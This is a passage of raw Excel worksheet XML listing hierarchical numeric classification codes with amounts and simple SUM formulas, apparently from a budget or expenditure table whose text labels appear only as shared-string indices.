    <row r="176" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A176" s="491">
        <v>2100799</v>
      </c>
      <c r="B176" s="491" t="s">
        <v>713</v>
      </c>
      <c r="C176" s="494">
        <v>1094</v>
      </c>
    </row>
    <row r="177" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A177" s="491">
        <v>21011</v>
      </c>
      <c r="B177" s="492" t="s">
        <v>714</v>
      </c>
      <c r="C177" s="493">
        <v>4030</v>
      </c>
    </row>
    <row r="178" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A178" s="491">
        <v>2101101</v>
      </c>
      <c r="B178" s="491" t="s">
        <v>715</v>
      </c>
      <c r="C178" s="494">
        <v>1617</v>
      </c>
    </row>
    <row r="179" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A179" s="491">
        <v>2101102</v>
      </c>
      <c r="B179" s="491" t="s">
        <v>716</v>
      </c>
      <c r="C179" s="494">
        <v>1743</v>
      </c>
    </row>
    <row r="180" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A180" s="491">
        <v>2101103</v>
      </c>
      <c r="B180" s="491" t="s">
        <v>717</v>
      </c>
      <c r="C180" s="494">
        <v>250</v>
      </c>
    </row>
    <row r="181" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A181" s="491">
        <v>2101199</v>
      </c>
      <c r="B181" s="491" t="s">
        <v>718</v>
      </c>
      <c r="C181" s="494">
        <v>420</v>
      </c>
    </row>
    <row r="182" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A182" s="491">
        <v>21012</v>
      </c>
      <c r="B182" s="492" t="s">
        <v>719</v>
      </c>
      <c r="C182" s="493">
        <v>2979</v>
      </c>
    </row>
    <row r="183" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A183" s="491">
        <v>2101202</v>
      </c>
      <c r="B183" s="491" t="s">
        <v>720</v>
      </c>
      <c r="C183" s="494">
        <v>2559</v>
      </c>
    </row>
    <row r="184" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A184" s="491">
        <v>2101299</v>
      </c>
      <c r="B184" s="491" t="s">
        <v>721</v>
      </c>
      <c r="C184" s="494">
        <v>420</v>
      </c>
    </row>
    <row r="185" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A185" s="491">
        <v>21013</v>
      </c>
      <c r="B185" s="492" t="s">
        <v>722</v>
      </c>
      <c r="C185" s="493">
        <v>148</v>
      </c>
    </row>
    <row r="186" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A186" s="491">
        <v>2101301</v>
      </c>
      <c r="B186" s="491" t="s">
        <v>723</v>
      </c>
      <c r="C186" s="494">
        <v>145</v>
      </c>
    </row>
    <row r="187" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A187" s="491">
        <v>2101302</v>
      </c>
      <c r="B187" s="491" t="s">
        <v>724</v>
      </c>
      <c r="C187" s="494">
        <v>3</v>
      </c>
    </row>
    <row r="188" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A188" s="491">
        <v>21014</v>
      </c>
      <c r="B188" s="492" t="s">
        <v>725</v>
      </c>
      <c r="C188" s="493">
        <v>5</v>
      </c>
    </row>
    <row r="189" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A189" s="491">
        <v>2101499</v>
      </c>
      <c r="B189" s="491" t="s">
        <v>726</v>
      </c>
      <c r="C189" s="494">
        <v>5</v>
      </c>
    </row>
    <row r="190" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A190" s="491">
        <v>21015</v>
      </c>
      <c r="B190" s="492" t="s">
        <v>727</v>
      </c>
      <c r="C190" s="493">
        <v>2</v>
      </c>
    </row>
    <row r="191" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A191" s="491">
        <v>2101599</v>
      </c>
      <c r="B191" s="491" t="s">
        <v>728</v>
      </c>
      <c r="C191" s="494">
        <v>2</v>
      </c>
    </row>
    <row r="192" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A192" s="491">
        <v>21016</v>
      </c>
      <c r="B192" s="492" t="s">
        <v>729</v>
      </c>
      <c r="C192" s="493">
        <v>3</v>
      </c>
    </row>
    <row r="193" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A193" s="491">
        <v>2101601</v>
      </c>
      <c r="B193" s="491" t="s">
        <v>730</v>
      </c>
      <c r="C193" s="494">
        <v>3</v>
      </c>
    </row>
    <row r="194" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A194" s="491">
        <v>21099</v>
      </c>
      <c r="B194" s="492" t="s">
        <v>731</v>
      </c>
      <c r="C194" s="493">
        <v>2516</v>
      </c>
    </row>
    <row r="195" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A195" s="491">
        <v>2109999</v>
      </c>
      <c r="B195" s="491" t="s">
        <v>732</v>
      </c>
      <c r="C195" s="494">
        <v>2516</v>
      </c>
    </row>
    <row r="196" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A196" s="491">
        <v>211</v>
      </c>
      <c r="B196" s="492" t="s">
        <v>733</v>
      </c>
      <c r="C196" s="493">
        <v>130</v>
      </c>
    </row>
    <row r="197" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A197" s="491">
        <v>21101</v>
      </c>
      <c r="B197" s="492" t="s">
        <v>734</v>
      </c>
      <c r="C197" s="493">
        <v>100</v>
      </c>
    </row>
    <row r="198" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A198" s="491">
        <v>2110199</v>
      </c>
      <c r="B198" s="491" t="s">
        <v>735</v>
      </c>
      <c r="C198" s="494">
        <v>100</v>
      </c>
    </row>
    <row r="199" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A199" s="491">
        <v>21102</v>
      </c>
      <c r="B199" s="492" t="s">
        <v>736</v>
      </c>
      <c r="C199" s="493">
        <v>30</v>
      </c>
    </row>
    <row r="200" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A200" s="491">
        <v>2110299</v>
      </c>
      <c r="B200" s="491" t="s">
        <v>737</v>
      </c>
      <c r="C200" s="494">
        <v>30</v>
      </c>
    </row>
    <row r="201" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A201" s="491">
        <v>212</v>
      </c>
      <c r="B201" s="492" t="s">
        <v>738</v>
      </c>
      <c r="C201" s="493">
        <v>2782</v>
      </c>
    </row>
    <row r="202" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A202" s="491">
        <v>21201</v>
      </c>
      <c r="B202" s="492" t="s">
        <v>739</v>
      </c>
      <c r="C202" s="493">
        <v>2397</v>
      </c>
    </row>
    <row r="203" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A203" s="491">
        <v>2120101</v>
      </c>
      <c r="B203" s="491" t="s">
        <v>561</v>
      </c>
      <c r="C203" s="494">
        <v>2376</v>
      </c>
    </row>
    <row r="204" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A204" s="491">
        <v>2120104</v>
      </c>
      <c r="B204" s="491" t="s">
        <v>740</v>
      </c>
      <c r="C204" s="494">
        <v>21</v>
      </c>
    </row>
    <row r="205" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A205" s="491">
        <v>21203</v>
      </c>
      <c r="B205" s="492" t="s">
        <v>741</v>
      </c>
      <c r="C205" s="493">
        <v>368</v>
      </c>
    </row>
    <row r="206" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A206" s="491">
        <v>2120303</v>
      </c>
      <c r="B206" s="491" t="s">
        <v>742</v>
      </c>
      <c r="C206" s="494">
        <v>10</v>
      </c>
    </row>
    <row r="207" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A207" s="491">
        <v>2120399</v>
      </c>
      <c r="B207" s="491" t="s">
        <v>743</v>
      </c>
      <c r="C207" s="494">
        <v>358</v>
      </c>
    </row>
    <row r="208" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A208" s="491">
        <v>21205</v>
      </c>
      <c r="B208" s="492" t="s">
        <v>744</v>
      </c>
      <c r="C208" s="493">
        <v>17</v>
      </c>
    </row>
    <row r="209" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A209" s="491">
        <v>2120501</v>
      </c>
      <c r="B209" s="491" t="s">
        <v>745</v>
      </c>
      <c r="C209" s="494">
        <v>17</v>
      </c>
    </row>
    <row r="210" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A210" s="491">
        <v>213</v>
      </c>
      <c r="B210" s="492" t="s">
        <v>746</v>
      </c>
      <c r="C210" s="493">
        <v>17027</v>
      </c>
    </row>
    <row r="211" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A211" s="491">
        <v>21301</v>
      </c>
      <c r="B211" s="492" t="s">
        <v>747</v>
      </c>
      <c r="C211" s="493">
        <v>14209</v>
      </c>
    </row>
    <row r="212" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A212" s="491">
        <v>2130101</v>
      </c>
      <c r="B212" s="491" t="s">
        <v>561</v>
      </c>
      <c r="C212" s="494">
        <v>6068</v>
      </c>
    </row>
    <row r="213" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A213" s="491">
        <v>2130108</v>
      </c>
      <c r="B213" s="491" t="s">
        <v>748</v>
      </c>
      <c r="C213" s="494">
        <v>2</v>
      </c>
    </row>
    <row r="214" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A214" s="491">
        <v>2130110</v>
      </c>
      <c r="B214" s="491" t="s">
        <v>749</v>
      </c>
      <c r="C214" s="494">
        <v>80</v>
      </c>
    </row>
    <row r="215" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A215" s="491">
        <v>2130126</v>
      </c>
      <c r="B215" s="491" t="s">
        <v>750</v>
      </c>
      <c r="C215" s="494">
        <v>4</v>
      </c>
    </row>
    <row r="216" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A216" s="491">
        <v>2130142</v>
      </c>
      <c r="B216" s="491" t="s">
        <v>751</v>
      </c>
      <c r="C216" s="494">
        <v>165</v>
      </c>
    </row>
    <row r="217" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A217" s="491">
        <v>2130199</v>
      </c>
      <c r="B217" s="491" t="s">
        <v>752</v>
      </c>
      <c r="C217" s="494">
        <v>7890</v>
      </c>
    </row>
    <row r="218" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A218" s="491">
        <v>21302</v>
      </c>
      <c r="B218" s="492" t="s">
        <v>753</v>
      </c>
      <c r="C218" s="493">
        <v>1229</v>
      </c>
    </row>
    <row r="219" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A219" s="491">
        <v>2130209</v>
      </c>
      <c r="B219" s="491" t="s">
        <v>754</v>
      </c>
      <c r="C219" s="494">
        <v>21</v>
      </c>
    </row>
    <row r="220" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A220" s="491">
        <v>2130234</v>
      </c>
      <c r="B220" s="491" t="s">
        <v>755</v>
      </c>
      <c r="C220" s="494">
        <v>1015</v>
      </c>
    </row>
    <row r="221" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A221" s="491">
        <v>2130299</v>
      </c>
      <c r="B221" s="491" t="s">
        <v>756</v>
      </c>
      <c r="C221" s="494">
        <v>193</v>
      </c>
    </row>
    <row r="222" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A222" s="491">
        <v>21303</v>
      </c>
      <c r="B222" s="492" t="s">
        <v>757</v>
      </c>
      <c r="C222" s="493">
        <v>11</v>
      </c>
    </row>
    <row r="223" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A223" s="491">
        <v>2130314</v>
      </c>
      <c r="B223" s="491" t="s">
        <v>758</v>
      </c>
      <c r="C223" s="494">
        <v>6</v>
      </c>
    </row>
    <row r="224" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A224" s="491">
        <v>2130335</v>
      </c>
      <c r="B224" s="491" t="s">
        <v>759</v>
      </c>
      <c r="C224" s="494">
        <v>6</v>
      </c>
    </row>
    <row r="225" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A225" s="491">
        <v>21305</v>
      </c>
      <c r="B225" s="492" t="s">
        <v>760</v>
      </c>
      <c r="C225" s="493">
        <v>23</v>
      </c>
    </row>
    <row r="226" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A226" s="491">
        <v>2130599</v>
      </c>
      <c r="B226" s="491" t="s">
        <v>761</v>
      </c>
      <c r="C226" s="494">
        <v>23</v>
      </c>
    </row>
    <row r="227" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A227" s="491">
        <v>21307</v>
      </c>
      <c r="B227" s="492" t="s">
        <v>762</v>
      </c>
      <c r="C227" s="493">
        <v>855</v>
      </c>
    </row>
    <row r="228" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A228" s="491">
        <v>2130705</v>
      </c>
      <c r="B228" s="491" t="s">
        <v>763</v>
      </c>
      <c r="C228" s="494">
        <v>780</v>
      </c>
    </row>
    <row r="229" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A229" s="491">
        <v>2130799</v>
      </c>
      <c r="B229" s="491" t="s">
        <v>764</v>
      </c>
      <c r="C229" s="494">
        <v>75</v>
      </c>
    </row>
    <row r="230" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A230" s="491">
        <v>21308</v>
      </c>
      <c r="B230" s="492" t="s">
        <v>765</v>
      </c>
      <c r="C230" s="493">
        <v>475</v>
      </c>
    </row>
    <row r="231" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A231" s="491">
        <v>2130803</v>
      </c>
      <c r="B231" s="491" t="s">
        <v>766</v>
      </c>
      <c r="C231" s="494">
        <v>25</v>
      </c>
    </row>
    <row r="232" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A232" s="491">
        <v>2130804</v>
      </c>
      <c r="B232" s="491" t="s">
        <v>767</v>
      </c>
      <c r="C232" s="494">
        <v>420</v>
      </c>
    </row>
    <row r="233" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A233" s="491">
        <v>2130899</v>
      </c>
      <c r="B233" s="491" t="s">
        <v>768</v>
      </c>
      <c r="C233" s="494">
        <v>30</v>
      </c>
    </row>
    <row r="234" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A234" s="491">
        <v>21399</v>
      </c>
      <c r="B234" s="492" t="s">
        <v>769</v>
      </c>
      <c r="C234" s="493">
        <v>225</v>
      </c>
    </row>
    <row r="235" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A235" s="491">
        <v>2139999</v>
      </c>
      <c r="B235" s="491" t="s">
        <v>770</v>
      </c>
      <c r="C235" s="494">
        <v>225</v>
      </c>
    </row>
    <row r="236" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A236" s="491">
        <v>214</v>
      </c>
      <c r="B236" s="492" t="s">
        <v>771</v>
      </c>
      <c r="C236" s="493">
        <v>1518</v>
      </c>
    </row>
    <row r="237" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A237" s="491">
        <v>21401</v>
      </c>
      <c r="B237" s="492" t="s">
        <v>772</v>
      </c>
      <c r="C237" s="493">
        <v>1220</v>
      </c>
    </row>
    <row r="238" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A238" s="491">
        <v>2140104</v>
      </c>
      <c r="B238" s="491" t="s">
        <v>773</v>
      </c>
      <c r="C238" s="494">
        <v>1020</v>
      </c>
    </row>
    <row r="239" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A239" s="491">
        <v>2140199</v>
      </c>
      <c r="B239" s="491" t="s">
        <v>774</v>
      </c>
      <c r="C239" s="494">
        <v>200</v>
      </c>
    </row>
    <row r="240" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A240" s="491">
        <v>21405</v>
      </c>
      <c r="B240" s="492" t="s">
        <v>775</v>
      </c>
      <c r="C240" s="493">
        <v>18</v>
      </c>
    </row>
    <row r="241" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A241" s="491">
        <v>2140599</v>
      </c>
      <c r="B241" s="491" t="s">
        <v>776</v>
      </c>
      <c r="C241" s="494">
        <v>18</v>
      </c>
    </row>
    <row r="242" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A242" s="491">
        <v>21406</v>
      </c>
      <c r="B242" s="492" t="s">
        <v>777</v>
      </c>
      <c r="C242" s="493">
        <v>280</v>
      </c>
    </row>
    <row r="243" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A243" s="491">
        <v>2140699</v>
      </c>
      <c r="B243" s="491" t="s">
        <v>778</v>
      </c>
      <c r="C243" s="494">
        <v>280</v>
      </c>
    </row>
    <row r="244" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A244" s="491">
        <v>215</v>
      </c>
      <c r="B244" s="492" t="s">
        <v>779</v>
      </c>
      <c r="C244" s="493">
        <v>1102</v>
      </c>
    </row>
    <row r="245" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A245" s="491">
        <v>21502</v>
      </c>
      <c r="B245" s="492" t="s">
        <v>780</v>
      </c>
      <c r="C245" s="493">
        <v>902</v>
      </c>
    </row>
    <row r="246" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A246" s="491">
        <v>2150299</v>
      </c>
      <c r="B246" s="491" t="s">
        <v>781</v>
      </c>
      <c r="C246" s="494">
        <v>902</v>
      </c>
    </row>
    <row r="247" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A247" s="491">
        <v>21508</v>
      </c>
      <c r="B247" s="492" t="s">
        <v>782</v>
      </c>
      <c r="C247" s="493">
        <v>200</v>
      </c>
    </row>
    <row r="248" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A248" s="491">
        <v>2150805</v>
      </c>
      <c r="B248" s="491" t="s">
        <v>783</v>
      </c>
      <c r="C248" s="494">
        <v>200</v>
      </c>
    </row>
    <row r="249" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A249" s="491">
        <v>216</v>
      </c>
      <c r="B249" s="492" t="s">
        <v>784</v>
      </c>
      <c r="C249" s="493">
        <v>1850</v>
      </c>
    </row>
    <row r="250" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A250" s="491">
        <v>21602</v>
      </c>
      <c r="B250" s="492" t="s">
        <v>785</v>
      </c>
      <c r="C250" s="493">
        <v>600</v>
      </c>
    </row>
    <row r="251" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A251" s="491">
        <v>2160299</v>
      </c>
      <c r="B251" s="491" t="s">
        <v>786</v>
      </c>
      <c r="C251" s="494">
        <v>600</v>
      </c>
    </row>
    <row r="252" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A252" s="491">
        <v>21606</v>
      </c>
      <c r="B252" s="492" t="s">
        <v>787</v>
      </c>
      <c r="C252" s="493">
        <v>1250</v>
      </c>
    </row>
    <row r="253" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A253" s="491">
        <v>2160699</v>
      </c>
      <c r="B253" s="491" t="s">
        <v>788</v>
      </c>
      <c r="C253" s="494">
        <v>1250</v>
      </c>
    </row>
    <row r="254" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A254" s="491">
        <v>220</v>
      </c>
      <c r="B254" s="492" t="s">
        <v>789</v>
      </c>
      <c r="C254" s="493">
        <v>101</v>
      </c>
    </row>
    <row r="255" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A255" s="491">
        <v>22001</v>
      </c>
      <c r="B255" s="492" t="s">
        <v>790</v>
      </c>
      <c r="C255" s="493">
        <v>101</v>
      </c>
    </row>
    <row r="256" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A256" s="491">
        <v>2200199</v>
      </c>
      <c r="B256" s="491" t="s">
        <v>791</v>
      </c>
      <c r="C256" s="494">
        <v>101</v>
      </c>
    </row>
    <row r="257" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A257" s="491">
        <v>221</v>
      </c>
      <c r="B257" s="492" t="s">
        <v>792</v>
      </c>
      <c r="C257" s="493">
        <v>10532</v>
      </c>
    </row>
    <row r="258" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A258" s="491">
        <v>22101</v>
      </c>
      <c r="B258" s="492" t="s">
        <v>793</v>
      </c>
      <c r="C258" s="493">
        <v>4651</v>
      </c>
    </row>
    <row r="259" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A259" s="491">
        <v>2210103</v>
      </c>
      <c r="B259" s="491" t="s">
        <v>794</v>
      </c>
      <c r="C259" s="494">
        <v>1000</v>
      </c>
    </row>
    <row r="260" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A260" s="491">
        <v>2210107</v>
      </c>
      <c r="B260" s="491" t="s">
        <v>795</v>
      </c>
      <c r="C260" s="494">
        <v>1200</v>
      </c>
    </row>
    <row r="261" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A261" s="491">
        <v>2210108</v>
      </c>
      <c r="B261" s="491" t="s">
        <v>796</v>
      </c>
      <c r="C261" s="494">
        <v>2451</v>
      </c>
    </row>
    <row r="262" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A262" s="491">
        <v>22102</v>
      </c>
      <c r="B262" s="492" t="s">
        <v>797</v>
      </c>
      <c r="C262" s="493">
        <v>5881</v>
      </c>
    </row>
    <row r="263" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A263" s="491">
        <v>2210201</v>
      </c>
      <c r="B263" s="491" t="s">
        <v>798</v>
      </c>
      <c r="C263" s="494">
        <v>5881</v>
      </c>
    </row>
    <row r="264" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A264" s="491">
        <v>224</v>
      </c>
      <c r="B264" s="492" t="s">
        <v>799</v>
      </c>
      <c r="C264" s="493">
        <v>2914</v>
      </c>
    </row>
    <row r="265" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A265" s="491">
        <v>22401</v>
      </c>
      <c r="B265" s="492" t="s">
        <v>800</v>
      </c>
      <c r="C265" s="493">
        <v>884</v>
      </c>
    </row>
    <row r="266" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A266" s="491">
        <v>2240106</v>
      </c>
      <c r="B266" s="491" t="s">
        <v>801</v>
      </c>
      <c r="C266" s="494">
        <v>324</v>
      </c>
    </row>
    <row r="267" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A267" s="491">
        <v>2240108</v>
      </c>
      <c r="B267" s="491" t="s">
        <v>802</v>
      </c>
      <c r="C267" s="494">
        <v>60</v>
      </c>
    </row>
    <row r="268" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A268" s="491">
        <v>2240199</v>
      </c>
      <c r="B268" s="491" t="s">
        <v>803</v>
      </c>
      <c r="C268" s="494">
        <v>500</v>
      </c>
    </row>
    <row r="269" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A269" s="491">
        <v>22402</v>
      </c>
      <c r="B269" s="492" t="s">
        <v>804</v>
      </c>
      <c r="C269" s="493">
        <v>2030</v>
      </c>
    </row>
    <row r="270" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A270" s="491">
        <v>2240201</v>
      </c>
      <c r="B270" s="491" t="s">
        <v>561</v>
      </c>
      <c r="C270" s="494">
        <v>300</v>
      </c>
    </row>
    <row r="271" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A271" s="491">
        <v>2240204</v>
      </c>
      <c r="B271" s="491" t="s">
        <v>805</v>
      </c>
      <c r="C271" s="494">
        <v>1700</v>
      </c>
    </row>
    <row r="272" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A272" s="491">
        <v>2240299</v>
      </c>
      <c r="B272" s="491" t="s">
        <v>806</v>
      </c>
      <c r="C272" s="494">
        <v>30</v>
      </c>
    </row>
    <row r="273" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A273" s="491">
        <v>232</v>
      </c>
      <c r="B273" s="492" t="s">
        <v>807</v>
      </c>
      <c r="C273" s="493">
        <v>9392</v>
      </c>
    </row>
    <row r="274" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A274" s="491">
        <v>23203</v>
      </c>
      <c r="B274" s="492" t="s">
        <v>808</v>
      </c>
      <c r="C274" s="493">
        <v>9392</v>
      </c>
    </row>
    <row r="275" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A275" s="491">
        <v>2320301</v>
      </c>
      <c r="B275" s="491" t="s">
        <v>809</v>
      </c>
      <c r="C275" s="494">
        <v>9392</v>
      </c>
    </row>
    <row r="276" spans="1:3" s="485" customFormat="1" ht="21" customHeight="1">
      <c r="A276" s="493">
        <v>227</v>
      </c>
      <c r="B276" s="493" t="s">
        <v>810</v>
      </c>
      <c r="C276" s="493">
        <v>2000</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A4:C276"/>
  <mergeCells count="3">
    <mergeCell ref="A1:C1"/>
    <mergeCell ref="A2:C2"/>
    <mergeCell ref="A3:C3"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39370078740157499" right="0.39370078740157499" top="0.39370078740157499" bottom="0.39370078740157499" header="0.511811023622047" footer="0.511811023622047"/>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showZeros="0" showOutlineSymbols="0" topLeftCell="B1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75"/>
  <sheetData/>
  <phoneticPr fontId="54" type="noConversion"/>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zoomScale="101" zoomScaleNormal="101" workbookViewId="0">
      <selection activeCell="G17" sqref="G17"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.42578125" defaultRowHeight="12"/>
  <cols>
    <col min="1" max="1" width="9.140625" style="476" customWidth="1"/>
    <col min="2" max="2" width="57.28515625" style="474" customWidth="1"/>
    <col min="3" max="3" width="18.140625" style="477" customWidth="1"/>
    <col min="4" max="16384" width="9.42578125" style="477"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="21" customHeight="1">
      <c r="A1" s="664" t="s">
        <v>811</v>
      </c>
      <c r="B1" s="664"/>
      <c r="C1" s="664"/>
    </row>
    <row r="2" spans="1:3" ht="27.95" customHeight="1">
      <c r="A2" s="698" t="s">
        <v>812</v>
      </c>
      <c r="B2" s="699"/>
      <c r="C2" s="698"/>
    </row>
    <row r="3" spans="1:3" ht="21" customHeight="1">
      <c r="A3" s="478"/>
      <c r="B3" s="479" t="s">
        <v>813</v>
      </c>
      <c r="C3" s="480" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="4" spans="1:3" s="474" customFormat="1" ht="33.75" customHeight="1">
      <c r="A4" s="350" t="s">
        <v>426</v>
      </c>
      <c r="B4" s="350" t="s">
        <v>427</v>
      </c>
      <c r="C4" s="350" t="s">
        <v>814</v>
      </c>
    </row>
    <row r="5" spans="1:3" s="474" customFormat="1" ht="27.75" customHeight="1">
      <c r="A5" s="667" t="s">
        <v>815</v>
      </c>
      <c r="B5" s="662"/>
      <c r="C5" s="481">
        <f>C6+C8+C12+C15+C21</f>
        <v>12859</v>
      </c>
    </row>
    <row r="6" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A6" s="669" t="s">
        <v>430</v>
      </c>
      <c r="B6" s="669"/>
      <c r="C6" s="481">
        <f>SUM(C7:C7)</f>
        <v>674</v>
      </c>
    </row>
    <row r="7" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A7" s="482">
        <v>1</v>
      </c>
      <c r="B7" s="483" t="s">
        <v>431</v>
      </c>
      <c r="C7" s="482">
        <v>674</v>
      </c>
    </row>
    <row r="8" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A8" s="661" t="s">
        <v>432</v>
      </c>
      <c r="B8" s="662"/>
      <c r="C8" s="481">
        <f>SUM(C9:C11)</f>
        <v>2620</v>
      </c>
    </row>
    <row r="9" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A9" s="482">
        <v>1</v>
      </c>
      <c r="B9" s="484" t="s">
        <v>433</v>
      </c>
      <c r="C9" s="482">
        <v>1220</v>
      </c>
    </row>
    <row r="10" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A10" s="482">
        <v>2</v>
      </c>
      <c r="B10" s="484" t="s">
        <v>434</v>
      </c>
      <c r="C10" s="482">
        <v>500</v>
      </c>
    </row>
    <row r="11" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
